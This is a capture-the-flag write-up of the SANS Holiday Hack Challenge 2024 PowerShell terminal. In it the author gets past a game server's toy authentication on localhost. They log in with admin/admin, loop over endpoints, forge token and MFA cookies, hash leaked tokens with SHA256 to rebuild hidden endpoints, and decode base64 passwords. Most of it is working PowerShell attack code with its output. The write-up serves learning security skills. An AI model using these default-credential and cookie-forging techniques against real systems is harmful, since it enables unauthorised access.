SANS Holiday Hack Challenge 2024 - Act 2

PowerShell

Difficulty: ❄ ❄ ❄ ❄ ❄
Team Wombley is developing snow weapons in preparation for conflict, but they’ve been locked out by their own defenses. Help Piney with regaining access to the weapon operations terminal.

Hints

PowerShell Admin Access - Total Control

From:
I overheard some of the other elves talking. Even though the endpoints have been redacted, they are still operational. This means that you can probably elevate your access by communicating with them. I suggest working out the hashing scheme to reproduce the redacted endpoints. Luckily one of them is still active and can be tested against. Try hashing the token with SHA256 and see if you can reliably reproduce the endpoint. This might help, pipe the tokens to Get-FileHash -Algorithm SHA256.

PowerShell Admin Access - Fakeout EDR Threshold

From:
They also mentioned this lazy elf who programmed the security settings in the weapons terminal. He created a fakeout protocol that he dubbed Elf Detection and Response “EDR”. The whole system is literally that you set a threshold and after that many attempts, the response is passed through… I can’t believe it. He supposedly implemented it wrong so the threshold cookie is highly likely shared between endpoints!

Silver trophy

    1. There is a file in the current directory called ‘welcome.txt’. Read the contents of this file
1
Get-Content ./welcome.txt
1
2
3
4
5
6
7
8
System Overview
The Elf Weaponry Multi-Factor Authentication (MFA) system safeguards access to a classified armory containing elf weapons. This high-security system is equipped with advanced defense mechanisms, including canaries, retinal scanner and keystroke analyzing, to prevent unauthorized access. In the event of suspicious activity, the system automatically initiates a lockdown, restricting all access until manual override by authorized personnel.

Lockdown Protocols
When the system enters lockdown mode, all access to the armory is frozen. This includes both entry to and interaction with the weaponry storage. The defense mechanisms become active, deploying logical barriers to prohibit unauthorized access. During this state, users cannot disable the system without the intervention of an authorized administrator. The system logs all access attempts and alerts central command when lockdown is triggered.

Access and System Restoration
To restore access to the system, users must follow strict procedures. First, authorized personnel must identify the scrambled endpoint. Next, they must deactivate the defense mechanisms by entering the override code and presenting the required token. After verification, the system will resume standard operation, and access to weaponry is reactivated.
    1. Geez that sounds ominous, I’m sure we can get past the defense mechanisms.
      We should warm up our PowerShell skills.
      How many words are there in the file?
1
Get-Content ./welcome.txt | Measure-Object -Word
1
2
3
Lines Words Characters Property
----- ----- ---------- --------
        180
    1. There is a server listening for incoming connections on this machine, that must be the weapons terminal. What port is it listening on?
1
netstat -an
1
2
3
4
5
6
7
8
9
10
11
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State      
tcp        0      0 127.0.0.1:1225          0.0.0.0:*               LISTEN     
tcp6       0      0 172.17.0.6:42026        52.179.73.57:443        ESTABLISHED
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node   Path
unix  2      [ ACC ]     STREAM     LISTENING     228127385 /tmp/dotnet-diagnostic-632-34546516-socket
unix  2      [ ACC ]     STREAM     LISTENING     228126347 /tmp/CoreFxPipe_PSHost.DB3A6E3C.632.None.pwsh
unix  2      [ ACC ]     STREAM     LISTENING     228069183 /tmp/tmux-1050/default
unix  3      [ ]         STREAM     CONNECTED     228069344 
unix  3      [ ]         STREAM     CONNECTED     228070105 /tmp/tmux-1050/default
    1. You should enumerate that webserver. Communicate with the server using HTTP, what status code do you get?
1
iwr http://localhost:1225
1
Invoke-WebRequest: Response status code does not indicate success: 401 (UNAUTHORIZED).
    1. It looks like defensive measures are in place, it is protected by basic authentication.
      Try authenticating with a standard admin username and password.
1
Invoke-WebRequest http://127.0.0.1:1225 -Credential (New-Object PSCredential("admin", (ConvertTo-SecureString "admin" -AsPlainText -Force))) -AllowUnencryptedAuthentication
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
                    ----------------------------------------------------
                    🪖 Elf MFA webserver🪖
                    ⚔️ Grab your tokens for access to weaponry ⚔️
                    ⚔️ Warning! Sensitive information on the server, protect a…
RawContent        : HTTP/1.1 200 OK
                    Server: Werkzeug/3.0.6
                    Server: Python/3.10.12
                    Date: Tue, 19 Nov 2024 10:35:53 GMT
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Content-Length: 3475
                    
                    <html>
                    <body>
                    <pre>
                    ---…
Headers           : {[Server, System.String[]], [Date, System.String[]], [Connection, System.S
                    tring[]], [Content-Type, System.String[]]…}
Images            : {}
InputFields       : {}
Links             : {@{outerHTML=<a href="http://localhost:1225/endpoints/1">Endpoint 1</a>; t
                    agName=A; href=http://localhost:1225/endpoints/1}, @{outerHTML=<a href="ht
                    tp://localhost:1225/endpoints/2">Endpoint 2</a>; tagName=A; href=http://lo
                    calhost:1225/endpoints/2}, @{outerHTML=<a href="http://localhost:1225/endp
                    oints/3">Endpoint 3</a>; tagName=A; href=http://localhost:1225/endpoints/3
                    }, @{outerHTML=<a href="http://localhost:1225/endpoints/4">Endpoint 4</a>;
                     tagName=A; href=http://localhost:1225/endpoints/4}…}
RawContentLength  : 3475
RelationLink      : {}
    1. There are too many endpoints here.
      Use a loop to download the contents of each page. What page has 138 words?
      When you find it, communicate with the URL and print the contents to the terminal.
1
2
3
4
5
6
7
8
$creds = New-Object System.Management.Automation.PSCredential("admin", (ConvertTo-SecureString "admin" -AsPlainText -Force))
$links = (iwr http://127.0.0.1:1225 -Credential $creds -AllowUnencryptedAuthentication).Links.Href
foreach ($url in $links) {                                                      
    $words = Invoke-WebRequest -Uri $url -Credential $creds -AllowUnencryptedAuthentication | Measure-Object –Word | select -expand Words
    if ($words -eq 138) {
        iwr $url -Credential $creds -AllowUnencryptedAuthentication | select -expand Content
    }
}
1
<html><head><title>MFA token scrambler</title></head><body><p>Yuletide cheer fills the air,<br>    A season of love, of care.<br>    The world is bright, full of light,<br>    As we celebrate this special night.<br>    The tree is trimmed, the stockings hung,<br>    Carols are sung, bells are rung.<br>    Families gather, friends unite,<br>    In the glow of the fire’s light.<br>    The air is filled with joy and peace,<br>    As worries and cares find release.<br>    Yuletide cheer, a gift so dear,<br>    Brings warmth and love to all near.<br>    May we carry it in our hearts,<br>    As the season ends, as it starts.<br>    Yuletide cheer, a time to share,<br>    The love, the joy, the care.<br>    May it guide us through the year,<br>    In every laugh, in every tear.<br>    Yuletide cheer, a beacon bright,<br>    Guides us through the winter night </p><p> Note to self, remember to remove temp csvfile at http://127.0.0.1:1225/token_overview.csv</p></body></html>
    1. There seems to be a csv file in the comments of that page.
      That could be valuable, read the contents of that csv-file!
1
2
$creds = New-Object System.Management.Automation.PSCredential("admin", (ConvertTo-SecureString "admin" -AsPlainText -Force))
iwr http://127.0.0.1:1225/token_overview.csv -Credential $creds -AllowUnencryptedAuthentication | select -expand Content
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
010f2cc580f74521c86215b7374eead6,REDACTED
29860c67296d808bc6506175a8cbb422,REDACTED
7b7f6891b6b6ab46fe2e85651db8205f,REDACTED
45ffb41c4e458d08a8b08beeec2b4652,REDACTED
d0e6bfb6a4e6531a0c71225f0a3d908d,REDACTED
bd7efda0cb3c6d15dd896755003c635c,REDACTED
5be8911ced448dbb6f0bd5a24cc36935,REDACTED
1acbfea6a2dad66eb074b17459f8c5b6,REDACTED
0f262d0003bd696550744fd43cd5b520,REDACTED
8cac896f624576d825564bb30c7250eb,REDACTED
8ef6d2e12a58d7ec521a56f25e624b80,REDACTED
b4959370a4c484c10a1ecc53b1b56a7d,REDACTED
38bdd7748a70529e9beb04b95c09195d,REDACTED
8d4366f08c013f5c0c587b8508b48b15,REDACTED
67566692ca644ddf9c1344415972fba8,REDACTED
8fbf4152f89b7e309e89b9f7080c7230,REDACTED
936f4db24a290032c954073b3913f444,REDACTED
c44d8d6b03dcd4b6bf7cb53db4afdca6,REDACTED
cb722d0b55805cd6feffc22a9f68177d,REDACTED
724d494386f8ef9141da991926b14f9b,REDACTED
67c7aef0d5d3e97ad2488babd2f4c749,REDACTED
5f8dd236f862f4507835b0e418907ffc,4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C
# [*] SYSTEMLOG
# [*] Defence mechanisms activated, REDACTING endpoints, starting with sensitive endpoints
# [-] ERROR, memory corruption, not all endpoints have been REDACTED
# [*] Verification endpoint still active
# [*] http://127.0.0.1:1225/tokens/<sha256sum>
# [*] Contact system administrator to unlock panic mode
# [*] Site functionality at minimum to keep weapons active
    1. Luckily the defense mechanisms were faulty!
      There seems to be one api-endpoint that still isn’t redacted! Communicate with that endpoint!
1
2
$creds = New-Object System.Management.Automation.PSCredential("admin", (ConvertTo-SecureString "admin" -AsPlainText -Force))
iwr http://127.0.0.1:1225/tokens/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C -Credential $creds -AllowUnencryptedAuthentication | select -Expand Content
1
<h1>[!] ERROR: Missing Cookie 'token'</h1>
    1. It looks like it requires a cookie token, set the cookie and try again.
1
2
3
4
5
6
7
8
9
10
$creds = New-Object System.Management.Automation.PSCredential("admin", (ConvertTo-SecureString "admin" -AsPlainText -Force))

$cookie = New-Object System.Net.Cookie
$cookie.Name = "token"
$cookie.Value = "5f8dd236f862f4507835b0e418907ffc"
$cookie.Domain = "127.0.0.1"
$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
$session.Cookies.Add($cookie)

iwr http://127.0.0.1:1225/tokens/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C -Credential $creds -AllowUnencryptedAuthentication -WebSession $session | select -Expand Content
1
<h1>Cookie 'mfa_code', use it at <a href='1732013309.8054779'>/mfa_validate/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C</a></h1>
    1. Sweet we got a MFA token! We might be able to get access to the system.
      Validate that token at the endpoint!
      This is the exact moment I had to use ChatGPT to write the code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$creds = New-Object System.Management.Automation.PSCredential("admin", (ConvertTo-SecureString "admin" -AsPlainText -Force))

$cookieContainer = New-Object System.Net.CookieContainer

$cookie = New-Object System.Net.Cookie
$cookie.Name = "token"
$cookie.Value = "5f8dd236f862f4507835b0e418907ffc"
$cookie.Domain = "127.0.0.1"
$cookieContainer.Add($cookie)

$response = Invoke-WebRequest -Uri http://127.0.0.1:1225/tokens/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C -WebSession (New-Object Microsoft.PowerShell.Commands.WebRequestSession -Property @{ Cookies = $cookieContainer }) -Credential $creds -AllowUnencryptedAuthentication
($response.Content -match "href='([^']+)'") | Out-Null
$mfaCode = $matches[1]

$mfaCookie = New-Object System.Net.Cookie
$mfaCookie.Name = "mfa_token"
$mfaCookie.Value = "$mfaCode"
$mfaCookie.Domain = "127.0.0.1"
$cookieContainer.Add($mfaCookie)

$validateUrl = "http://127.0.0.1:1225/mfa_validate/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C"
Invoke-WebRequest -Uri $validateUrl -WebSession (New-Object Microsoft.PowerShell.Commands.WebRequestSession -Property @{ Cookies = $cookieContainer }) -Credential $creds -AllowUnencryptedAuthentication | select -Expand Content
1
<h1>[+] Success</h1><br><p>Q29ycmVjdCBUb2tlbiBzdXBwbGllZCwgeW91IGFyZSBncmFudGVkIGFjY2VzcyB0byB0aGUgc25vdyBjYW5ub24gdGVybWluYWwuIEhlcmUgaXMgeW91ciBwZXJzb25hbCBwYXNzd29yZCBmb3IgYWNjZXNzOiBTbm93TGVvcGFyZDJSZWFkeUZvckFjdGlvbg==</p>
    1. That looks like base64! Decode it so we can get the final secret!
1
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("Q29ycmVjdCBUb2tlbiBzdXBwbGllZCwgeW91IGFyZSBncmFudGVkIGFjY2VzcyB0byB0aGUgc25vdyBjYW5ub24gdGVybWluYWwuIEhlcmUgaXMgeW91ciBwZXJzb25hbCBwYXNzd29yZCBmb3IgYWNjZXNzOiBTbm93TGVvcGFyZDJSZWFkeUZvckFjdGlvbg=="))
1
Correct Token supplied, you are granted access to the snow cannon terminal. Here is your personal password for access: SnowLeopard2ReadyForAction
    1. Hurray! You have thwarted their defenses!
      Alabaster can now access their weaponry and put a stop to it.
      Once HHC grants your achievement, you can close this terminal.

Gold trophy

To obtain the gold trophy I followed the hints of PowerShell Admin Access - Total Control and I had to write a lot of code ending up in an unreasonably long powershell script:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
$creds = New-Object System.Management.Automation.PSCredential("admin", (ConvertTo-SecureString "admin" -AsPlainText -Force))
$cookieContainer = New-Object System.Net.CookieContainer

$response = iwr http://127.0.0.1:1225/token_overview.csv -Credential $creds -AllowUnencryptedAuthentication
$content_array = $response -split "\n"

$cookie = New-Object System.Net.Cookie
$cookie.Name = "token"
$cookie.Value = "5f8dd236f862f4507835b0e418907ffc"
$cookie.Domain = "127.0.0.1"
$cookieContainer.Add($cookie)

foreach ($line in $content_array) {
    if (-Not $line.StartsWith("#") -and -Not $line.startsWith("file_MD5hash")) {
        $line = ($line -Split ",")[0]
        $token_cookie = New-Object System.Net.Cookie
        $token_cookie.Name = "token"
        $token_cookie.Value = $line
        $token_cookie.Domain = "127.0.0.1"
        $cookieContainer.Add($token_cookie)
        $session = New-Object Microsoft.PowerShell.Commands.WebRequestSession -Property @{ Cookies = $cookieContainer }

        $string = "$line`n"
        $bytes = [System.Text.Encoding]::UTF8.GetBytes($string)
        $sha256 = [System.Security.Cryptography.SHA256]::Create()
        $hashBytes = $sha256.ComputeHash($bytes)
        $hashString = -join ($hashBytes | ForEach-Object { $_.ToString("x2") })

        $response = Invoke-WebRequest -Uri http://127.0.0.1:1225/tokens/$hashString -Credential $creds -AllowUnencryptedAuthentication -WebSession $session
        ($response.Content -match "href='([^']+)'") | Out-Null
        $mfaCode = $matches[1]

        $mfaCookie = New-Object System.Net.Cookie
        $mfaCookie.Name = "mfa_token"
        $mfaCookie.Value = "$mfaCode"
        $mfaCookie.Domain = "127.0.0.1"

        $cookieContainer.Add($mfaCookie)

        $validateUrl = "http://127.0.0.1:1225/mfa_validate/$hashString"
        $response = Invoke-WebRequest -Uri $validateUrl -WebSession $session -Credential $creds -AllowUnencryptedAuthentication
        if (-Not $response.Content.Contains("ERROR")) {
            echo "$response"
        }
    }
}
1
2
3
4
<h1>[*] Setting cookie attempts</h1>                                                           
<h1>[+] Success, defense mechanisms deactivated.</h1><br>Administrator Token supplied, You are able to control the production and deployment of the snow cannons. May the best elves win: WombleysProductionLineShallPrevail</p>
<h1>[+] Success</h1><br><p>Q29ycmVjdCBUb2tlbiBzdXBwbGllZCwgeW91IGFyZSBncmFudGVkIGFjY2VzcyB0byB0aGUgc25vdyBjYW5ub24gdGVybWluYWwuIEhlcmUgaXMgeW91ciBwZXJzb25hbCBwYXNzd29yZCBmb3IgYWNjZXNzOiBTbm93TGVvcGFyZDJSZWFkeUZvckFjdGlvbg==</p>
<h1>[!] System currently in lock down</h1><br><h1>[!] Failure, token has expired. [*] Default timeout set to 2s for security reasons</h1>

Just don’t

I will not even discuss how painful it has been to write the code for this challenge.